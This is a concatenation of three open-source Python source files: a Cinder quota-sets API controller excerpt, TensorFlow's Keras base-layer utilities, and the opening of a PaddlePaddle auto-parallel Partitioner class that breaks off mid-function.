target_project = quota_utils.get_project_hierarchy(
ctxt, proj_id)
parent_id = target_project.parent_id
if parent_id:
# Get the children of the project which the token is scoped to
# in order to know if the target_project is in its hierarchy.
context_project = quota_utils.get_project_hierarchy(
ctxt, ctxt.project_id, subtree_as_ids=True)
self._authorize_update_or_delete(context_project,
target_project.id,
parent_id)
defaults = QUOTAS.get_defaults(ctxt, proj_id)
# If the project which is being deleted has allocated part of its
# quota to its subprojects, then subprojects' quotas should be
# deleted first.
for res, value in project_quotas.items():
if 'allocated' in project_quotas[res].keys():
if project_quotas[res]['allocated'] > 0:
msg = _("About to delete child projects having "
"non-zero quota. This should not be performed")
raise webob.exc.HTTPBadRequest(explanation=msg)
# Ensure quota usage wouldn't exceed limit on a delete
self._validate_existing_resource(
res, defaults[res], project_quotas)
try:
db.quota_destroy_by_project(ctxt, target_project.id)
except exception.AdminRequired:
raise webob.exc.HTTPForbidden()
for res, limit in project_quotas.items():
            # Update child limit to 0 so the parent hierarchy gets its
            # allocated values updated properly
self._update_nested_quota_allocated(
ctxt, target_project, project_quotas, res, 0)
def validate_setup_for_nested_quota_use(self, req):
"""Validates that the setup supports using nested quotas.
Ensures that Keystone v3 or greater is being used, and that the
existing quotas make sense to nest in the current hierarchy (e.g. that
        no child quota would be larger than its parent).
"""
ctxt = req.environ['cinder.context']
params = req.params
try:
quota_utils.validate_setup_for_nested_quota_use(
ctxt, QUOTAS.resources, quota.NestedDbQuotaDriver(),
fix_allocated_quotas=params.get('fix_allocated_quotas'))
except exception.InvalidNestedQuotaSetup as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
class Quotas(extensions.ExtensionDescriptor):
"""Quota management support."""
name = "Quotas"
alias = "os-quota-sets"
updated = "2011-08-08T00:00:00+00:00"
def get_resources(self):
resources = []
res = extensions.ResourceExtension(
'os-quota-sets', QuotaSetsController(),
member_actions={'defaults': 'GET'},
collection_actions={'validate_setup_for_nested_quota_use': 'GET'})
resources.append(res)
return resources
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains private utilities used mainly by the base Layer class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.python import tf2
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import control_flow_v2_func_graphs
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import init_ops_v2
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training.tracking import base as tracking
from tensorflow.python.util import nest
from tensorflow.python.util import tf_contextlib
_call_context = threading.local()
def create_mean_metric(value, name=None):
  # Importing keras would import base_layer and then this module, and metrics
  # rely on base_layer, which results in a cyclic dependency.
from tensorflow.python.keras import metrics as metrics_module # pylint: disable=g-import-not-at-top
metric_obj = metrics_module.Mean(name=name, dtype=value.dtype)
return metric_obj, metric_obj(value)
def make_variable(name,
shape=None,
dtype=dtypes.float32,
initializer=None,
trainable=None,
caching_device=None,
validate_shape=True,
constraint=None,
use_resource=None,
collections=None,
synchronization=tf_variables.VariableSynchronization.AUTO,
aggregation=tf_variables.VariableAggregation.NONE,
partitioner=None): # pylint: disable=unused-argument
"""Temporary util to create a variable (relies on `variable_scope.variable`).
Some reuse-related technicalities prevent us from using
`variable_scope.get_variable()` directly, so we use a subcomponent
that has fewer constraints (`variable_scope.variable()`).
In the longer term, it seems like a similar "default variable creator" method
should exist in `Trackable` instead. When this happens, we can get
rid of this temporary solution.
TODO(fchollet): remove this method when no longer needed.
Arguments:
name: Variable name.
shape: Variable shape.
dtype: The type of the variable. Defaults to `self.dtype` or `float32`.
initializer: Initializer instance (callable).
trainable: Whether the variable should be part of the layer's
"trainable_variables" (e.g. variables, biases)
or "non_trainable_variables" (e.g. BatchNorm mean, stddev).
Note, if the current variable scope is marked as non-trainable
then this parameter is ignored and any added variables are also
marked as non-trainable. `trainable` defaults to `True` unless
`synchronization` is set to `ON_READ`.
caching_device: Passed to `tf.Variable`.
validate_shape: Passed to `tf.Variable`.
constraint: Constraint instance (callable).
use_resource: Whether to use a `ResourceVariable`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
    synchronization: Indicates when a distributed variable will be
      aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
partitioner: Not handled at this time.
Returns:
Variable instance.
"""
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(
initializer,
(type(init_ops.Initializer), type(init_ops_v2.Initializer))):
initializer = initializer()
init_val = lambda: initializer(shape, dtype=dtype)
variable_dtype = dtype.base_dtype
if use_resource is None:
use_resource = True
# TODO(apassos,rohanj) figure out how to remove collections from here so we
# can remove the V1.
variable_shape = tensor_shape.TensorShape(shape)
return tf_variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
collections=collections,
synchronization=synchronization,
aggregation=aggregation,
shape=variable_shape if variable_shape else None)
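# Illustrative sketch (not part of the original module): `make_variable` is the
# low-level creator that `Layer.add_weight` typically routes through; a direct
# call would look roughly like
#
#   kernel = make_variable(
#       'kernel',
#       shape=(784, 10),
#       dtype=dtypes.float32,
#       initializer=init_ops_v2.GlorotUniform(),
#       trainable=True)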
def collect_previous_mask(input_tensors):
"""Retrieves the output mask(s) of the previous node.
Arguments:
input_tensors: An arbitrary structure of Tensors.
Returns:
A mask tensor or list of mask tensors.
"""
def _collect_previous_mask(x):
return getattr(x, '_keras_mask', None)
return nest.map_structure(_collect_previous_mask, input_tensors)
def have_all_keras_metadata(tensors):
return all(hasattr(x, '_keras_history') for x in nest.flatten(tensors))
def generate_placeholders_from_shape(shape):
return array_ops.placeholder(shape=shape, dtype=backend.floatx())
def create_keras_history(tensors):
"""Wraps TensorFlow Operations for compatibility with the Functional API.
This method checks to see if a Tensor in `tensors` is missing Keras metadata
and has its origin in a Keras `Input` Layer. If so, this method will replace
the raw TensorFlow Operations that created this tensor with
`TensorFlowOpLayer` instances that create identical operations.
Any Tensors not originating from a Keras `Input` Layer will be treated as
constants when constructing `TensorFlowOpLayer` instances.
Arguments:
tensors: A structure of Tensors, some of which come from raw TensorFlow
operations and need to have Keras metadata assigned to them.
Returns:
created_layers: List. The `TensorFlowOpLayer` instances created to wrap
the raw Tensorflow operations.
"""
_, created_layers = _create_keras_history_helper(tensors, set(), [])
return created_layers
def _create_keras_history_helper(tensors, processed_ops, created_layers):
"""Helper method for `create_keras_history`.
Arguments:
tensors: A structure of Tensors for which to create Keras metadata.
processed_ops: Set. TensorFlow operations that have already been wrapped in
`TensorFlowOpLayer` instances.
created_layers: List. The `TensorFlowOpLayer` instances created.
Returns:
Tuple. First element is the updated set of TensorFlow Operations that
have been wrapped in `TensorFlowOpLayer` instances. Second element is
a list of the `TensorFlowOpLayer` instances created.
"""
# Import of `base_layer` needed in order to create `TensorFlowOpLayer`.
# Cannot be imported at top because of circular dependencies.
# TODO(omalleyt): Resolve circular dependency.
from tensorflow.python.keras.engine import base_layer # pylint: disable=g-import-not-at-top
tensor_list = nest.flatten(tensors)
for tensor in tensor_list:
if getattr(tensor, '_keras_history', None) is not None:
continue
op = tensor.op # The Op that created this Tensor.
if op not in processed_ops:
if op.type.startswith('Sparse'):
lambda_example = """
weights_mult = lambda x: tf.sparse.sparse_dense_matmul(x, weights)
output = tf.keras.layers.Lambda(weights_mult)(input)
"""
raise ValueError(
'Sparse ops are not supported with functional models with built-in '
'layer wrapping. Please wrap the sparse ops in a Lambda layer like'
': \n{lambda_example}\n'.format(lambda_example=lambda_example))
# Recursively set `_keras_history`.
op_inputs = list(op.inputs)
constants = {}
layer_inputs = []
for i, op_input in enumerate(op_inputs):
if uses_keras_history(op_input):
layer_inputs.append(op_input)
else:
# Treat any value not originating from a `keras.Input` as
# a constant. Variables cannot be supported.
ds_with_session = (
distribution_strategy_context.in_cross_replica_context() and
not ops.executing_eagerly_outside_functions())
using_xla = control_flow_util.GraphOrParentsInXlaContext(
ops.get_default_graph())
if ds_with_session or using_xla:
# In Legacy Graph mode, evaluating here makes Session be
# configured improperly. The downside of this is that saving
# via `get_config` breaks, but SavedModel still works.
constants[i] = op_input
else:
with ops.init_scope():
constants[i] = backend.function([], op_input)([])
layer_inputs = unnest_if_single_tensor(layer_inputs)
processed_ops, created_layers = _create_keras_history_helper(
layer_inputs, processed_ops, created_layers)
name = op.name
node_def = op.node_def.SerializeToString()
op_layer = base_layer.TensorFlowOpLayer(
node_def, constants=constants, name=name)
created_layers.append(op_layer)
op_layer._add_inbound_node( # pylint: disable=protected-access
layer_inputs, op.outputs)
processed_ops.update([op])
return processed_ops, created_layers
def unnest_if_single_tensor(input_tensors):
# Preserve compatibility with older configs
flat_input_tensors = nest.flatten(input_tensors)
# If this is a single element but not a dict, unwrap. If this is a dict,
# assume the first layer expects a dict (as is the case with a
# DenseFeatures layer); pass through.
if not isinstance(input_tensors, dict) and len(flat_input_tensors) == 1:
input_tensors = flat_input_tensors[0]
return input_tensors
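# Illustrative sketch (not part of the original module), where `t`, `t1`, `t2`
# are placeholder tensors:
#
#   unnest_if_single_tensor([t])              # -> t
#   unnest_if_single_tensor({'feature': t})   # -> {'feature': t}  (dicts pass through)
#   unnest_if_single_tensor([t1, t2])         # -> [t1, t2]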
def needs_keras_history(tensors, ignore_call_context=False):
"""Check if any Tensors need to be wrapped in TensorFlowOpLayers.
This will never return True inside a sublayer, because sublayers
do not need to create Keras History. Otherwise, this returns True
if one or more of `tensors` originates from a `keras.Input` and
does not have `_keras_history` set.
Arguments:
tensors: An arbitrary nested structure of Tensors.
ignore_call_context: Whether to ignore the check of if currently
outside of a `call` context. This is `True` when creating
KerasHistory inside `Node`, where we always know that Tensors
are being used with the Functional API.
Returns:
Bool, whether at least one Tensor needs to be wrapped.
"""
input_tensors = nest.flatten(tensors)
if call_context().in_call and not ignore_call_context:
return False
if all(
getattr(tensor, '_keras_history', None) is not None
for tensor in input_tensors):
# KerasHistory already set.
return False
return uses_keras_history(tensors)
def is_in_keras_graph():
"""Returns if currently executing inside of a Keras graph."""
return call_context().in_keras_graph
def is_in_eager_or_tf_function():
"""Returns if in eager mode or inside of a tf.function."""
return context.executing_eagerly() or is_in_tf_function()
def is_in_tf_function():
"""Returns if inside of a tf.function."""
# Check if running in V1 graph mode.
if not ops.executing_eagerly_outside_functions():
return False
if not ops.inside_function():
return False
# Check if inside Keras FuncGraph.
if is_in_keras_graph():
return False
# Check for a v1 `wrap_function` FuncGraph.
graph = ops.get_default_graph()
if (getattr(graph, 'name', False) and
graph.name.startswith('wrapped_function')):
return False
return True
def uses_keras_history(tensors):
"""Check if at least one Tensor originates from a `keras.Input`.
This is `True` if at least one Tensor has its origin in a `keras.Input`.
Any Tensor that originates from a `keras.Input` will have a dependency
Tensor with a `_keras_history` attribute attached. Tensors that have
already been checked to not originate from a `keras.Input`
are marked as `_keras_history_checked`.
Arguments:
tensors: An arbitrary nested structure of Tensors.
Returns:
Bool, whether at least one Tensor originates from a `keras.Input`.
"""
checked_tensors = set()
tensors_to_check = nest.flatten(tensors)
while tensors_to_check:
new_tensors_to_check = []
for tensor in tensors_to_check:
if id(tensor) in checked_tensors:
continue
checked_tensors.add(id(tensor))
if getattr(tensor, '_keras_history_checked', None) is not None:
continue
if getattr(tensor, '_keras_history', None) is not None:
return True
try:
new_tensors_to_check.extend(tensor.op.inputs)
except AttributeError:
# In case `tensor` is a Variable created in an Eager context.
pass
tensors_to_check = new_tensors_to_check
# Mark that these Tensors have been checked once for `_keras_history`,
# and should not be checked again for performance reasons.
mark_checked(tensors)
return False
def mark_checked(tensors):
"""Marks that these Tensors should not be tracked.
This prevents Layers from attempting to create TensorFlowOpLayers
for these Tensors.
Arguments:
tensors: An arbitrary structure of Tensors.
"""
def _mark_checked(tensor):
tensor._keras_history_checked = True # pylint: disable=protected-access
nest.map_structure(_mark_checked, tensors)
def call_context():
"""Returns currently active `CallContext`."""
if getattr(_call_context, 'call_context', None) is None:
_call_context.call_context = CallContext()
return _call_context.call_context
control_flow_util_v2._register_keras_layer_context_function(call_context) # pylint: disable=protected-access
class CallContext(object):
"""Keeps track of properties currently inside a Layer/Model's `call`.
Attributes:
layer: The `Layer` whose `call` is currently active.
inputs: The inputs to the currently active `Layer`.
frozen: Whether currently executing inside a `Layer` with `trainable` set to
`False`.
in_call: Whether currently inside the `call` of a Layer.
training: Whether currently executing in training or inference mode.
in_keras_graph: Whether executing inside the Keras Graph.
saving: Whether currently saving to SavedModel.
"""
def __init__(self):
self.layer = None
self.inputs = None
self.frozen = False
self.in_call = False
self.training = None
self._in_keras_graph = False
self.saving = False
@tf_contextlib.contextmanager
def enter(self, layer, inputs, build_graph, training, saving=None):
"""Push a Layer and its inputs and state onto the current call context."""
prev_layer = self.layer
prev_inputs = self.inputs
prev_frozen = self.frozen
prev_in_call = self.in_call
prev_training = self.training
prev_in_keras_graph = self._in_keras_graph
prev_saving = self.saving
self.layer = layer
self.inputs = inputs
self.frozen = self.frozen or not layer.trainable
self.in_call = True
self.training = training
self._in_keras_graph = (
self._in_keras_graph or
(build_graph and
getattr(backend.get_graph(), 'name', None) == 'keras_graph'))
self.saving = prev_saving if saving is None else saving
try:
yield
finally:
self.layer = prev_layer
self.inputs = prev_inputs
self.frozen = prev_frozen
self.in_call = prev_in_call
self.training = prev_training
self._in_keras_graph = prev_in_keras_graph
self.saving = prev_saving
@property
def in_keras_graph(self):
# Returns True even if in a subgraph of the Keras graph, such as those
# created by control flow ops.
if context.executing_eagerly():
return False
return (self._in_keras_graph or
getattr(backend.get_graph(), 'name', None) == 'keras_graph')
def training_arg_passed_to_call(argspec, args, kwargs):
"""Returns whether a user passed the `training` argument in `__call__`."""
# `argspec.args` starts with ['self', 'inputs']
full_args = dict(zip(argspec.args[2:], args))
full_args.update(kwargs)
return 'training' in full_args and full_args['training'] is not None
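# Illustrative sketch (hypothetical layer): for `call(self, inputs, training=None,
# mask=None)`, argspec.args is ['self', 'inputs', 'training', 'mask'] and `args`
# holds the positional arguments after `inputs`, so:
#
#   training_arg_passed_to_call(argspec, args=(), kwargs={})                  # False
#   training_arg_passed_to_call(argspec, args=(True,), kwargs={})             # True
#   training_arg_passed_to_call(argspec, args=(), kwargs={'training': None})  # False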
def autocast_context_manager(dtype):
"""Returns a context manager to autocast AutoCastVariables.
Under this context manager, AutoCastVariables will be casted to `dtype` if
`dtype` is floating-point. Otherwise, AutoCastVariables will not be casted.
Args:
dtype: The dtype to cast AutoCastVariables to, or None.
Returns:
A context manager to automatically cast AutoCastVariables.
"""
if dtype and not dtypes.as_dtype(dtype).is_floating:
dtype = None
return ops.get_default_graph()._enable_auto_casting_variables(dtype) # pylint: disable=protected-access
def is_subclassed(layer):
"""Returns True if the object is a subclassed layer or subclassed model."""
return (layer.__module__.find('keras.engine') == -1 and
layer.__module__.find('keras.layers') == -1)
def from_saved_model(layer):
"""Returns whether the layer is loaded from a SavedModel."""
return layer.__module__.find('keras.saving.saved_model') != -1
def check_graph_consistency(tensor=None, method='add_loss', force_raise=False):
"""Checks that tensors passed to `add_*` method match the Keras graph.
When one of the `add_*` method is called inside a V2 conditional branch,
the underlying tensor gets created in a FuncGraph managed by control_flow_v2.
We need to raise clear error messages in such cases.
Arguments:
tensor: Tensor to check, or `False` if it is known that an error
should be raised.
method: Caller method, one of {'add_metric', 'add_loss', 'add_update'}.
force_raise: If an error should be raised regardless of `tensor`.
Raises:
RuntimeError: In case of an out-of-graph tensor.
"""
if (force_raise or
(ops.executing_eagerly_outside_functions() and
hasattr(tensor, 'graph') and
isinstance(tensor.graph,
(control_flow_v2_func_graphs.CondBranchFuncGraph,
control_flow_v2_func_graphs.WhileCondFuncGraph,
control_flow_v2_func_graphs.WhileBodyFuncGraph)))):
if method == 'activity_regularizer':
bad_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
if training:
return self.dense(x)
else:
return self.dense(x)
"""
correct_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
return self.dense(x)
"""
raise RuntimeError(
'You are using a layer with `activity_regularizer` in a control flow '
'branch, e.g.:\n{bad_example}\nThis is currently not supported. '
'Please move your call to the layer with `activity_regularizer` out '
'of the control flow branch, e.g.:\n{correct_example}\n'
'You can also resolve this by marking your outer model/layer dynamic'
' (eager-only) by passing `dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you to implement static '
'shape inference in the `compute_output_shape(input_shape)` '
'method.'.format(
bad_example=bad_example, correct_example=correct_example))
if method == 'add_metric':
bad_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
else:
metric = 0.
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
elif method == 'add_loss':
bad_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
self.add_loss(loss)
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
else:
loss = 0.
self.add_loss(loss)
return inputs
"""
else:
bad_example = """
def call(self, inputs, training=None):
if training:
self.add_update(self.w.assign_add(1))
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
increment = 1
else:
increment = 0
self.add_update(self.w.assign_add(increment))
return inputs
"""
raise RuntimeError(
'You are using the method `{method}` in a control flow branch '
'in your layer, e.g.:\n{bad_example}\n'
'This is not currently supported. '
'Please move your call to {method} out of the control flow branch, '
'e.g.:\n{correct_example}\n'
'You can also resolve this by marking your layer '
'as dynamic (eager-only) by passing '
'`dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you '
'to implement static shape inference '
'in the `compute_output_shape(input_shape)` method.'.format(
method=method,
bad_example=bad_example,
correct_example=correct_example))
def mark_as_return(outputs, acd):
"""Marks `outputs` as the return values for automatic control deps."""
def _mark_as_return(tensor):
"""Marks `tensor` as the return value for automatic control deps."""
if not tensor_util.is_tensor(tensor):
return tensor
# pylint: disable=protected-access
return_tensor = acd.mark_as_return(tensor)
if getattr(tensor, '_keras_mask', None) is not None:
return_tensor._keras_mask = acd.mark_as_return(tensor._keras_mask)
else:
return_tensor._keras_mask = None
# Handle TensorFlow Probability attached metadata.
# TODO(b/132076537): Remove this once TFP uses `CompositeTensor`.
if getattr(tensor, '_tfp_distribution', None) is not None:
return_tensor._tfp_distribution = tensor._tfp_distribution
return return_tensor
# pylint: enable=protected-access
return nest.map_structure(_mark_as_return, outputs)
V2_DTYPE_BEHAVIOR = None
def enable_v2_dtype_behavior():
"""Enable the V2 dtype behavior for Keras layers.
By default, the V2 dtype behavior is enabled in TensorFlow 2.
When enabled, the dtype of Keras layers defaults to floatx (which is typically
float32) instead of None. In addition, layers will automatically cast
floating-point inputs to the layer's dtype.
For example, once enabled, the following block will run a Conv2D layer
in float32:
```python
x = tf.ones((4, 4, 4, 4), dtype='float64')
layer = tf.keras.layers.Conv2D(filters=4, kernel_size=2)
print(layer.dtype) # Float32 when enabled. None when disabled.
# When enabled, will cast inputs to the layer's dtype, which is float32. When
# disabled, will do no casting, so the layer is done in float64.
y = layer(x)
```
A layer author can opt their layer out of the automatic input casting by
passing `autocast=False` to the base Layer's constructor. This disables the
autocasting part of the V2 behavior for that layer, but not the defaulting to
floatx part of the V2 behavior.
When a global `tf.keras.mixed_precision.experimental.Policy` is set, the
layer's dtype will default to the global policy instead of floatx. Layers
will automatically cast inputs to the policy's compute_dtype.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = True
def disable_v2_dtype_behavior():
"""Disables the V2 dtype behavior for Keras layers.
See `enable_v2_dtype_behavior`.
This function will be removed in the future.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = False
def v2_dtype_behavior_enabled():
"""Returns True if the V2 dtype behavior is enabled."""
if V2_DTYPE_BEHAVIOR is None:
return tf2.enabled()
return V2_DTYPE_BEHAVIOR
class TrackableWeightHandler(object):
"""Keras wrapper for handling tracking.Trackable object saving and restoring.
This class handles Trackables in both V1 and V2 modes, ensuring that they can
be saved and restored with the correct data and without adding additional ops
on every save.
Attributes:
trackable: The trackable to wrap.
num_tensors: The number of tensors that this trackable requires for saving.
"""
def __init__(self, trackable):
if not isinstance(trackable, tracking.Trackable):
raise ValueError('%s is not a Trackable object.' % (trackable,))
self._trackable = trackable
# TODO(b/141682913): Figure out why this is private and fix it.
saveables = trackable._gather_saveables_for_checkpoint().values() # pylint: disable=protected-access
if len(saveables) != 1:
raise ValueError('Only Trackables with one Saveable are supported.')
saveable = list(saveables)[0]
if ops.executing_eagerly_outside_functions():
# If we're in eager mode, we need to defer calling the Trackable's
# saveable() callable until data export time.
# However, it is safe to call the saveable as many times as we want, so
# we will call it now to figure out how many tensors this Trackable will
# produce.
self._saveable = saveable
self._num_tensors = len(self._saveable().specs)
self._setter = lambda weights: self._saveable().restore(weights, None)
self._getter = lambda: [spec.tensor for spec in self._saveable().specs]
else:
# If we're in Graph mode, we need to evaluate the Saveable only once and
# cache the resulting restore graph. Failing to do this will result in
# new assignment ops being added to the graph each time set_weights() is
# called.
self._placeholder_tensors = []
self._saveable = saveable()
self._num_tensors = len(self._saveable.specs)
for spec in self._saveable.specs:
tensor = spec.tensor
self._placeholder_tensors.append(
array_ops.placeholder(tensor.dtype, tensor.shape))
self._assign_op = self._saveable.restore(self._placeholder_tensors, None)
self._setter = self._set_weights_v1
self._getter = lambda: [spec.tensor for spec in self._saveable.specs]
@property
def num_tensors(self):
return self._num_tensors
def set_weights(self, weights):
if len(weights) != self._num_tensors:
raise ValueError(
('Weight handler for trackable %s received the wrong number of ' +
'weights: expected %s, got %s.') %
(self._trackable, self._num_tensors, len(weights)))
self._setter(weights)
def get_tensors(self):
return self._getter()
def _set_weights_v1(self, weights):
feed_dict = {}
for idx, tensor in enumerate(weights):
feed_dict[self._placeholder_tensors[idx]] = tensor
backend.get_session().run(self._assign_op, feed_dict)
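# Illustrative sketch (assumption, not original code): wrapping a Trackable so
# its weights can be read and written uniformly in V1 and V2 modes. `table`
# stands in for any Trackable that exposes exactly one Saveable.
#
#   handler = TrackableWeightHandler(table)
#   values = backend.batch_get_value(handler.get_tensors())
#   handler.set_weights(values)  # restores the same values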
# TODO(kathywu): This is a temporary hack. When a network of layers is revived
# from SavedModel, only the top-level layer will have losses. This causes issues
# in eager mode because the child layers may have graph losses
# (thus model.losses returns a mix of Eager and graph tensors). To fix this,
# whenever eager losses are added to one layer, add eager losses to all
# child layers. This causes `.losses` to only return eager losses.
REVIVED_LOSS_PLACEHOLDER = (
'This layer\'s losses have been added to the parent layer.')
|
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import copy
import numpy as np
import paddle
import paddle.fluid as fluid
from paddle.fluid import core
from paddle.fluid import framework as framework
from paddle.fluid import core, unique_name
from paddle.fluid.framework import Program, Parameter, Variable, program_guard
from paddle.distributed.auto_parallel.operators.common import get_distributed_operator_impl_container
from paddle.distributed.auto_parallel.dist_context import DistributedContext, DistributedOperatorContext
from .dist_attribute import OperatorDistributedAttribute
from .process_group import new_process_group
from .utils import set_dist_op_desc_original_id
from .utils import print_program_with_dist_attr, is_forward_op, is_backward_op
from .operators.common import BACKWARD_ONLY_DIST_OPS
__varname_not_in_block__ = ["lod_tensor_blocking_queue_0"]
__not_shape_var_type__ = [
core.VarDesc.VarType.READER, core.VarDesc.VarType.STEP_SCOPES
]
class Partitioner(object):
"""
warning:: Partitioner is experimental and subject to change.
Partitioner converts a program into another program.
Given a serial program which has been auto completed with shard annotations, the Partitioner
converts the serial program into a "distributed" program. The Partitioner modifies the serial
program in the following two ways, which is also the major difference between a serial and a distributed program:
1. partition op: replace a serial op with its corresponding dist op inferred from the shard annotation
2. partition var: if a var is sharded, modify the shape of the var according to its shard annotation
Partitioner is supposed to be called by the auto parallel framework, and not supposed to be called directly by the user.
"""
def __init__(self, dist_context, rank_id=0):
"""
Args:
dist_context (paddle.fluid.DistributedContext): used to access the distributed_attr of vars & ops. Every Partitioner object may maintain its own DistributedContext member and partition the program based on that shard scenario.
rank_id (int): global rank id to which the partitioned distributed program belongs.
"""
if not isinstance(dist_context, DistributedContext):
raise TypeError(
"dist_context be paddle.fluid.DistributedContext, got %s here" %
type(dist_context))
self._dist_context = dist_context
self._rank_id = rank_id
self._serial2dist_varname_mapping = {}
self._dist_varname_suffix = ""
def partition(self, serial_main_program, serial_startup_program,
params_grads):
if not isinstance(serial_main_program, (Program)):
raise TypeError(
"main_program be paddle.fluid.framework.program, got %s here" %
type(serial_main_program))
# check if shard annotated serial program valid
if not self._is_valid_annotated_program(serial_main_program):
raise RuntimeError(
"Not all vars or ops are annotated in main program !")
# init distop helper
dist_op_context = self._dist_context.dist_op_context
dist_op_context.varname_mapping = self._serial2dist_varname_mapping
dist_op_context.rank_id = self._rank_id
# partition startup program
if serial_startup_program is None:
partitioned_startup_prog = None
else:
partitioned_startup_prog = self.partition_startup_program(
serial_main_program, serial_startup_program)
dist_op_context.dst_startup_program = partitioned_startup_prog
# partition main program
partitioned_main_prog, partitioned_params_grads = self.partition_main_program(
serial_main_program, params_grads)
return partitioned_main_prog, partitioned_startup_prog, partitioned_params_grads
def partition_startup_program(self, serial_main_program,
serial_startup_program):
if not isinstance(serial_startup_program, (Program)):
raise TypeError(
"dist_context be paddle.fluid.framework.program, got %s here" %
type(serial_startup_program))
partitioned_startup_prog = fluid.Program()
ref_block = serial_main_program.global_block()
target_block = partitioned_startup_prog.global_block()
var2shape = {}
temp_varname_map = {}
# tensors
for var in serial_startup_program.list_vars():
assert var.persistable
new_name = var.name + self._dist_varname_suffix
temp_varname_map[var.name] = new_name
target_shape = _partition_var(self._dist_context, ref_block,
target_block, var.name, new_name)
var2shape[new_name] = target_shape
# ops
for op in serial_startup_program.global_block().ops:
# TODO: if a var does not belong to this rank, it should be filtered out
output_vars = op.desc.output_arg_names()
assert len(
output_vars
) == 1, "initializer should output only ONE variable, but got [{}]".format(
str(op.desc))
assert temp_varname_map[output_vars[
0]] in var2shape, "try to initialize [{}] which is not a persistable var".format(
output_vars[0])
new_op_desc = target_block.desc.append_op()
new_op_desc.copy_from(op.desc)
new_op_desc._rename_output(output_vars[0],
temp_varname_map[output_vars[0]])
new_op_desc._set_attr("shape",
var2shape[temp_varname_map[output_vars[0]]])
target_block._sync_with_cpp()
# set distributed attribute
new_op = target_block.ops[-1]
assert new_op.type == new_op_desc.type()
assert new_op.desc == new_op_desc
output_var = target_block.var(output_vars[0])
output_var_attr = self._dist_context.get_tensor_dist_attr_for_program(
output_var)
op_attr = OperatorDistributedAttribute()
op_attr.process_mesh = output_var_attr.process_mesh
op_attr.set_output_dims_mapping(output_var.name,
output_var_attr.dims_mapping)
op_attr.set_input_dims_mapping(output_var.name,
output_var_attr.dims_mapping)
self._dist_context.set_op_dist_attr_for_program(new_op, op_attr)
return partitioned_startup_prog
def partition_main_program(self, serial_main_program, params_and_grads):
"""
1. partition variables
2. replace local op with corresponding dist op
"""
partitioned_main_prog = fluid.Program()
dist_op_context = self._dist_context.dist_op_context
dist_op_context.dst_main_program = partitioned_main_prog
for idx in range(self._dist_context.block_state.nblock):
ref_block = serial_main_program.blocks[idx]
if idx == 0:
target_block = partitioned_main_prog.blocks[0]
else:
target_block = partitioned_main_prog._create_block(
parent_idx=ref_block.parent_idx)
assert ref_block.idx == target_block.idx
target_block._set_forward_block_idx(ref_block.forward_block_idx)
dist_op_context.work_block = target_block
self.partition_block(ref_block, target_block)
partitioned_main_prog.current_block_idx = 0
partitioned_params_and_grads = []
for p, g in params_and_grads:
assert p.name in self._serial2dist_varname_mapping
dist_p = self._get_dist_var_by_serial_var(p, partitioned_main_prog)
if g is None:
dist_g = None
else:
assert g.name in self._serial2dist_varname_mapping
dist_g = self._get_dist_var_by_serial_var(g,
partitioned_main_prog)
